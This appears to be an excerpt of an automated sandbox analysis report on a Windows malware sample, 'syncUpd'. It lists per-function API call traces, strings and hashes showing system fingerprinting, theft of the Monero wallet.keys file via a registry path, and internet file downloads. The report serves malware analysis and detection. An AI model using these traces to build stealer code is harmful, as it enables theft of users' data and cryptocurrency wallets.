                                                                                                                                                                                                                                    • Part of subcall function 00414300: HeapAlloc.KERNEL32(00000000), ref: 0041431B
                                                                                                                                                                                                                                    • Part of subcall function 00414300: RegOpenKeyExA.KERNEL32(80000002,00720768,00000000,00020119,00000000), ref: 0041433B
                                                                                                                                                                                                                                    • Part of subcall function 00414300: RegQueryValueExA.KERNEL32(00000000,00724C90,00000000,00000000,000000FF,000000FF), ref: 0041435C
                                                                                                                                                                                                                                    • Part of subcall function 00414300: RegCloseKey.ADVAPI32(00000000), ref: 00414366
                                                                                                                                                                                                                                    • Part of subcall function 00414380: GetCurrentProcess.KERNEL32(00000000,?,?,0040FF99,00000000,?,007250D8,00000000,?,0041D74C,00000000,?,00000000,00000000,?,0071DB48), ref: 0041438F
                                                                                                                                                                                                                                    • Part of subcall function 00414380: IsWow64Process.KERNEL32(00000000,?,?,0040FF99,00000000,?,007250D8,00000000,?,0041D74C,00000000,?,00000000,00000000,?,0071DB48), ref: 00414396
                                                                                                                                                                                                                                    • Part of subcall function 004143C0: GetProcessHeap.KERNEL32(00000000,00000104,00401177,0071DA18,004136EB,0041D6E3), ref: 004143CD
                                                                                                                                                                                                                                    • Part of subcall function 004143C0: HeapAlloc.KERNEL32(00000000), ref: 004143D4
                                                                                                                                                                                                                                    • Part of subcall function 004143C0: GetUserNameA.ADVAPI32(?,00000104), ref: 004143EC
                                                                                                                                                                                                                                    • Part of subcall function 00414400: GetProcessHeap.KERNEL32(00000000,00000104,004136EB,0041D6E3), ref: 0041440D
                                                                                                                                                                                                                                    • Part of subcall function 00414400: HeapAlloc.KERNEL32(00000000), ref: 00414414
                                                                                                                                                                                                                                    • Part of subcall function 00414400: GetComputerNameA.KERNEL32(?,00000104), ref: 0041442C
                                                                                                                                                                                                                                    • Part of subcall function 00414450: GetProcessHeap.KERNEL32(00000000,00000104,?,0041D748,00000000,?,00000000,0041D2B1), ref: 0041445D
                                                                                                                                                                                                                                    • Part of subcall function 00414450: HeapAlloc.KERNEL32(00000000), ref: 00414464
                                                                                                                                                                                                                                    • Part of subcall function 00414450: GetLocalTime.KERNEL32(?), ref: 00414471
                                                                                                                                                                                                                                    • Part of subcall function 00414450: wsprintfA.USER32 ref: 004144A0
                                                                                                                                                                                                                                    • Part of subcall function 004144B0: GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?,00724D08,00000000,?,0041D758,00000000,?,00000000,00000000,?,00725238,00000000), ref: 004144C0
                                                                                                                                                                                                                                    • Part of subcall function 004144B0: HeapAlloc.KERNEL32(00000000), ref: 004144C7
                                                                                                                                                                                                                                    • Part of subcall function 004144B0: GetTimeZoneInformation.KERNEL32(?), ref: 004144DA
                                                                                                                                                                                                                                    • Part of subcall function 00414530: GetUserDefaultLocaleName.KERNEL32(00000000,00000055,00000000,00000000,?,00724D08,00000000,?,0041D758,00000000,?,00000000,00000000,?,00725238,00000000), ref: 00414542
                                                                                                                                                                                                                                    • Part of subcall function 00414570: GetKeyboardLayoutList.USER32(00000000,00000000,0041D146), ref: 0041459E
                                                                                                                                                                                                                                    • Part of subcall function 00414570: LocalAlloc.KERNEL32(00000040,?), ref: 004145B6
                                                                                                                                                                                                                                    • Part of subcall function 00414570: GetKeyboardLayoutList.USER32(?,00000000), ref: 004145CA
                                                                                                                                                                                                                                    • Part of subcall function 00414570: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 0041461F
                                                                                                                                                                                                                                    • Part of subcall function 00414570: LocalFree.KERNEL32(00000000), ref: 004146DF
                                                                                                                                                                                                                                    • Part of subcall function 00414710: GetSystemPowerStatus.KERNEL32(00000000), ref: 0041471A
                                                                                                                                                                                                                                  • GetCurrentProcessId.KERNEL32(00000000,?,00725458,00000000,?,0041D76C,00000000,?,00000000,00000000,?,00724D80,00000000,?,0041D768,00000000), ref: 0041037E
                                                                                                                                                                                                                                    • Part of subcall function 00415B70: OpenProcess.KERNEL32(00000410,00000000,?), ref: 00415B84
                                                                                                                                                                                                                                    • Part of subcall function 00415B70: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00415BA5
                                                                                                                                                                                                                                    • Part of subcall function 00415B70: CloseHandle.KERNEL32(00000000), ref: 00415BAF
                                                                                                                                                                                                                                    • Part of subcall function 00414740: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00414754
                                                                                                                                                                                                                                    • Part of subcall function 00414740: HeapAlloc.KERNEL32(00000000), ref: 0041475B
                                                                                                                                                                                                                                    • Part of subcall function 00414740: RegOpenKeyExA.KERNEL32(80000002,00720A78,00000000,00020119,00000000), ref: 0041477B
                                                                                                                                                                                                                                    • Part of subcall function 00414740: RegQueryValueExA.KERNEL32(00000000,007252B8,00000000,00000000,000000FF,000000FF), ref: 0041479C
                                                                                                                                                                                                                                    • Part of subcall function 00414740: RegCloseKey.ADVAPI32(00000000), ref: 004147A6
                                                                                                                                                                                                                                    • Part of subcall function 00414800: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,00000000), ref: 00414846
                                                                                                                                                                                                                                    • Part of subcall function 00414800: GetLastError.KERNEL32 ref: 00414855
                                                                                                                                                                                                                                    • Part of subcall function 004147C0: GetSystemInfo.KERNEL32(00000000), ref: 004147CD
                                                                                                                                                                                                                                    • Part of subcall function 004147C0: wsprintfA.USER32 ref: 004147E3
                                                                                                                                                                                                                                    • Part of subcall function 00414960: GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,00000000,?,00724B88,00000000,?,0041D774,00000000,?,00000000,00000000,?,00724DC8), ref: 0041496D
                                                                                                                                                                                                                                    • Part of subcall function 00414960: HeapAlloc.KERNEL32(00000000), ref: 00414974
                                                                                                                                                                                                                                    • Part of subcall function 00414960: GlobalMemoryStatusEx.KERNEL32(00000040), ref: 00414995
                                                                                                                                                                                                                                    • Part of subcall function 00414960: __aulldiv.LIBCMT ref: 004149AF
                                                                                                                                                                                                                                    • Part of subcall function 00414960: __aulldiv.LIBCMT ref: 004149BD
                                                                                                                                                                                                                                    • Part of subcall function 00414960: wsprintfA.USER32 ref: 004149E9
                                                                                                                                                                                                                                    • Part of subcall function 00414ED0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00414F1C
                                                                                                                                                                                                                                    • Part of subcall function 00414ED0: HeapAlloc.KERNEL32(00000000), ref: 00414F23
                                                                                                                                                                                                                                    • Part of subcall function 00414ED0: wsprintfA.USER32 ref: 00414F3D
                                                                                                                                                                                                                                    • Part of subcall function 00414AE0: RegOpenKeyExA.KERNEL32(00000000,007229B8,00000000,00020019,00000000,0041D289), ref: 00414B41
                                                                                                                                                                                                                                    • Part of subcall function 00414AE0: RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00414BC3
                                                                                                                                                                                                                                    • Part of subcall function 00414AE0: wsprintfA.USER32 ref: 00414BF6
                                                                                                                                                                                                                                    • Part of subcall function 00414AE0: RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 00414C18
                                                                                                                                                                                                                                    • Part of subcall function 00414AE0: RegCloseKey.ADVAPI32(00000000), ref: 00414C29
                                                                                                                                                                                                                                    • Part of subcall function 00414AE0: RegCloseKey.ADVAPI32(00000000), ref: 00414C36
                                                                                                                                                                                                                                    • Part of subcall function 00414DE0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00414E07
                                                                                                                                                                                                                                    • Part of subcall function 00414DE0: Process32First.KERNEL32(00000000,00000128), ref: 00414E1B
                                                                                                                                                                                                                                    • Part of subcall function 00414DE0: Process32Next.KERNEL32(00000000,00000128), ref: 00414E30
                                                                                                                                                                                                                                    • Part of subcall function 00414DE0: FindCloseChangeNotification.KERNEL32(00000000), ref: 00414E9E
                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000,?,00000000,00000000,00000000), ref: 0041095B
                                                                                                                                                                                                                                    • Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
                                                                                                                                                                                                                                    • Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
                                                                                                                                                                                                                                    • Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,0071DC68), ref: 00404ED9
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000011.00000002.3150779278.0000000000400000.00000040.00000001.01000000.00000012.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000447000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000549000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000624000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000636000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Heap$Process$Alloc$CloseOpen$wsprintf$Namelstrcpy$InformationLocallstrlen$CurrentInfoKeyboardLayoutListLocaleProcess32QueryStatusSystemTimeUserValue__aulldivlstrcat$ChangeComputerCreateDefaultDirectoryEnumErrorFileFindFirstFreeGlobalHandleInternetLastLogicalMemoryModuleNextNotificationPowerProcessorSnapshotToolhelp32VolumeWindowsWow64Zone
                                                                                                                                                                                                                                  • String ID: (Nr$0Lr$8Rr$8Tr$@Nr$E.A$HLr$PMr$XNr$XTr$hMr$pKr$Kr$Mr
                                                                                                                                                                                                                                  • API String ID: 1035121393-1129311606
                                                                                                                                                                                                                                  • Opcode ID: b5be15e578514541cbe00f75d159f3d3b31949e5212b32f0acd236ce710b653a
                                                                                                                                                                                                                                  • Instruction ID: c29c4d19e1a1d8256a8b8cfc17993bd3f91cdea4a247a897ffed86f061f16859
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b5be15e578514541cbe00f75d159f3d3b31949e5212b32f0acd236ce710b653a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9372B076D10118AACB15FB91EC91EDEB73DAF14308F51439FB01662491EF346B89CBA8
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0040F630 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 298stringCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • strtok_s.MSVCRT ref: 0040F667
                                                                                                                                                                                                                                  • strtok_s.MSVCRT ref: 0040FA8F
                                                                                                                                                                                                                                    • Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,0071C6F8,?,0041D8AC,?,00000000), ref: 00416E2B
                                                                                                                                                                                                                                    • Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000011.00000002.3150779278.0000000000400000.00000040.00000001.01000000.00000012.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000447000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000549000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000624000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000636000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: strtok_s$lstrcpylstrlen
                                                                                                                                                                                                                                  • String ID: Pr$pNr
                                                                                                                                                                                                                                  • API String ID: 348468850-1981644568
                                                                                                                                                                                                                                  • Opcode ID: bfa52de86468f06c75ce6d1a715682b1cd9076c0a6941fb9bd0619d7694f907c
                                                                                                                                                                                                                                  • Instruction ID: 2b3dd8003c7db60ae6f20250f168b485c10b0cdbdb2f80ad8031a0e3e82ebbeb
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bfa52de86468f06c75ce6d1a715682b1cd9076c0a6941fb9bd0619d7694f907c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B4C1A7B5900619DBCB24EF60DC89FDA7779AF58304F00459EE40DA7191DB34AAC9CFA8
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 004012D0 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 139stringfileCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • memset.MSVCRT ref: 004012E7
                                                                                                                                                                                                                                    • Part of subcall function 00401260: GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 00401274
                                                                                                                                                                                                                                    • Part of subcall function 00401260: HeapAlloc.KERNEL32(00000000), ref: 0040127B
                                                                                                                                                                                                                                    • Part of subcall function 00401260: RegOpenKeyExA.KERNEL32(000000FF,?,00000000,00020119,?), ref: 00401297
                                                                                                                                                                                                                                    • Part of subcall function 00401260: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012B5
                                                                                                                                                                                                                                    • Part of subcall function 00401260: RegCloseKey.ADVAPI32(?), ref: 004012BF
                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,00000000), ref: 0040130F
                                                                                                                                                                                                                                  • lstrlen.KERNEL32(?), ref: 0040131C
                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,.keys), ref: 00401337
                                                                                                                                                                                                                                    • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                    • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                    • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                    • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                    • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                    • Part of subcall function 00415260: GetSystemTime.KERNEL32(?,0071FD48,0041D129,?,?,?,?,?,?,?,?,?,00404623,?,00000014), ref: 00415286
                                                                                                                                                                                                                                    • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                    • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                                  • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00401425
                                                                                                                                                                                                                                    • Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6
                                                                                                                                                                                                                                    • Part of subcall function 004093A0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004093CC
                                                                                                                                                                                                                                    • Part of subcall function 004093A0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 004093F1
                                                                                                                                                                                                                                    • Part of subcall function 004093A0: LocalAlloc.KERNEL32(00000040,?), ref: 00409411
                                                                                                                                                                                                                                    • Part of subcall function 004093A0: ReadFile.KERNEL32(000000FF,?,00000000,'@,00000000), ref: 0040943A
                                                                                                                                                                                                                                    • Part of subcall function 004093A0: LocalFree.KERNEL32('@), ref: 00409470
                                                                                                                                                                                                                                    • Part of subcall function 004093A0: FindCloseChangeNotification.KERNEL32(000000FF), ref: 0040947A
                                                                                                                                                                                                                                  • DeleteFileA.KERNEL32(00000000), ref: 004014A9
                                                                                                                                                                                                                                  • memset.MSVCRT ref: 004014D0
                                                                                                                                                                                                                                    • Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
                                                                                                                                                                                                                                    • Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
                                                                                                                                                                                                                                    • Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,0071DC68), ref: 00404ED9
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000011.00000002.3150779278.0000000000400000.00000040.00000001.01000000.00000012.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000447000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000549000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000624000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000636000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Filelstrcpy$lstrcat$lstrlen$AllocCloseHeapLocalOpenmemset$ChangeCopyCreateDeleteFindFreeInternetNotificationProcessQueryReadSizeSystemTimeValue
                                                                                                                                                                                                                                  • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                                                                                                                                                                                                                  • API String ID: 2054947926-218353709
                                                                                                                                                                                                                                  • Opcode ID: 8ecb341a66b89b849433301520a94322b030dca6bcef82e315c726d59ae6010f
                                                                                                                                                                                                                                  • Instruction ID: 465d6e3be360dc7981781b6de12631b9db2cd28431e3bfe2701297f35846b4c8
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8ecb341a66b89b849433301520a94322b030dca6bcef82e315c726d59ae6010f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DD5123B195021897CB15EB61DD92BED773D9F54304F4041EDB60A62091DE385BC5CFA8
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 004141C0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 89memoryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 004141DF
                                                                                                                                                                                                                                  • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041421C
                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 004142A0
                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 004142A7
                                                                                                                                                                                                                                  • wsprintfA.USER32 ref: 004142DD
                                                                                                                                                                                                                                    • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000011.00000002.3150779278.0000000000400000.00000040.00000001.01000000.00000012.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000447000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000549000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000624000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000636000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Heap$AllocDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                                                                                                                                                                                                                  • String ID: :$C$\
                                                                                                                                                                                                                                  • API String ID: 3790021787-3809124531
                                                                                                                                                                                                                                  • Opcode ID: 6ca11245975395cfb749b767d31339a8af53aa26318921bdecc0eb4ed934f432
                                                                                                                                                                                                                                  • Instruction ID: 52054a8b39965f6583c41ffabf349f0ba0ed2356e3a02770a6039194ee1378f4
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6ca11245975395cfb749b767d31339a8af53aa26318921bdecc0eb4ed934f432
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BA3194B0D00258EBDF20DFA4DC45BEE77B4AF48304F104099F5496B281DB78AAD5CB95
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00414960 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 50memoryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,00000000,?,00724B88,00000000,?,0041D774,00000000,?,00000000,00000000,?,00724DC8), ref: 0041496D
                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 00414974
                                                                                                                                                                                                                                  • GlobalMemoryStatusEx.KERNEL32(00000040), ref: 00414995
                                                                                                                                                                                                                                  • __aulldiv.LIBCMT ref: 004149AF
                                                                                                                                                                                                                                  • __aulldiv.LIBCMT ref: 004149BD
                                                                                                                                                                                                                                  • wsprintfA.USER32 ref: 004149E9
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000011.00000002.3150779278.0000000000400000.00000040.00000001.01000000.00000012.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000447000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000549000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000624000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000636000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Heap__aulldiv$AllocGlobalMemoryProcessStatuswsprintf
                                                                                                                                                                                                                                  • String ID: %d MB$@
                                                                                                                                                                                                                                  • API String ID: 2886426298-3474575989
                                                                                                                                                                                                                                  • Opcode ID: f62cb7ad2578be9c21b89e6e1bf921e4f1007482674ad6998ac9b57a816d1492
                                                                                                                                                                                                                                  • Instruction ID: f510475f390b20142bb5ad9b480526056b42ea6839ab7368ec165d8bd78ed5c1
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f62cb7ad2578be9c21b89e6e1bf921e4f1007482674ad6998ac9b57a816d1492
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 84111EB0D40208ABDB10DFE4CC49FAE77B8BB48704F104549F715BB284D7B8A9418B99
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00405D40 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6
                                                                                                                                                                                                                                    • Part of subcall function 00404470: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044F6
                                                                                                                                                                                                                                    • Part of subcall function 00404470: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404506
                                                                                                                                                                                                                                  • InternetOpenA.WININET(0041D7D3,00000001,00000000,00000000,00000000), ref: 00405DAF
                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,0071DC68), ref: 00405DE7
                                                                                                                                                                                                                                  • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 00405E2F
                                                                                                                                                                                                                                  • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00405E53
                                                                                                                                                                                                                                  • InternetReadFile.WININET(00410E73,?,00000400,?), ref: 00405E7C
                                                                                                                                                                                                                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00405EAA
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,00000400), ref: 00405EE9
                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00410E73), ref: 00405EF3
                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00405F00
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000011.00000002.3150779278.0000000000400000.00000040.00000001.01000000.00000012.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000447000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000549000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000624000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000636000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2507841554-0
                                                                                                                                                                                                                                  • Opcode ID: 8d9a3180b18a5efc90efd9d912cec60318239b29a62a7d3eda4b771ff523c89c
                                                                                                                                                                                                                                  • Instruction ID: 46018c2d0393d599e49b8942d3c4f4431f3cc1562104312217daf3d911a1fc92
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8d9a3180b18a5efc90efd9d912cec60318239b29a62a7d3eda4b771ff523c89c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DB514471A00618ABDB20DF51CC45BEF7779EB44305F1081AAB645B71C0DB78AB85CF99
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00409970 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 116libraryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetEnvironmentVariableA.KERNEL32(0071D8C8,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0000FFFF,?,?,?,?,?,?,?,?,?,?,?,0040EA16), ref: 0040998D
                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(00725298,?,?,?,?,?,?,?,?,?,?,?,0040EA16), ref: 00409A16
                                                                                                                                                                                                                                    • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                    • Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,0071C6F8,?,0041D8AC,?,00000000), ref: 00416E2B
                                                                                                                                                                                                                                    • Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85
                                                                                                                                                                                                                                    • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                    • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                    • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                    • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                    • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
